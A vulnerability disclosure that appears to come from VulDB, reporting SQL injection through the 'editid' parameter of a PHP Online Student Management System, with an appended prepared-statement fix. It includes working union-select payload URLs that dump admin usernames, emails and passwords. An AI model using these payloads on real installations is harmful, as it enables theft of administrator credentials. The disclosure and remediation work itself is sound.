Submission #95872: eduAuthorities SQL Injection

Title: eduAuthorities SQL Injection

Description:

Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html

Version environment: php=7.3.4 Mysql=5.7.26 Apache=2.4.39

Preparation: Create a "student" database in mysql. Set the database username and password in "dbconnection.php", and then access http://localhost/eduauth/index.php to log in with the account and password.

Vulnerability: http://localhost/eduauth/edit-class-detail.php?editid=1

On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be directly exploited.

http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#

You can see that data information is returned.

Poc: http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#

Vulnerability principle: Check the "edit-class-detail.php" file. On line 55, the user input parameter "editid" is directly concatenated into the SQL statement, and on line 57, a query is performed.
User: 0chen (UID 41914)
Submitted: 28/02/2023 08:35 (3 years ago)
Moderated: 28/02/2023 21:03 (12 hours later)
Status: Accepted
VulDB entry: 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid SQL injection]
Points: 17
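The defect the submission describes is a GET parameter concatenated straight into a query string. The following is an added example, not code from the submission or from the Online Student Management System project: it places that concatenation pattern next to a prepared-statement rewrite. The connection variable `$con`, the table name `tblclass` and the column name `ID` are assumptions chosen for illustration, not names taken from the project, and the example assumes the mysqli extension with mysqlnd (needed for `get_result()`).

```php
<?php
// Added example, not the project's code. $con, "tblclass" and "ID" are
// assumed names used only to illustrate the pattern.

// Pattern the report describes: the raw request value becomes part of the
// SQL text, so the database parses whatever the client sent as SQL.
function fetchClassUnsafe(mysqli $con, string $editid): ?array
{
    $sql = "SELECT * FROM tblclass WHERE ID=" . $editid;   // vulnerable
    $result = $con->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened version: validate the type up front, then bind the value as a
// parameter so it travels separately from the query text and can never
// change the statement's structure.
function fetchClassSafe(mysqli $con, string $editid): ?array
{
    // Only a non-negative integer id is acceptable; anything else is rejected
    // before it reaches the database.
    if (!ctype_digit($editid)) {
        return null;
    }
    $id = (int) $editid;

    $stmt = $con->prepare("SELECT * FROM tblclass WHERE ID = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param("i", $id);   // "i": bind as integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage (assumes $con was created by the application's dbconnection.php):
// $row = fetchClassSafe($con, $_GET['editid'] ?? '');
```

Rejecting non-digit input is a defence-in-depth check only; the prepared statement is what removes the injection, because the bound value is never interpreted as SQL regardless of its content.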
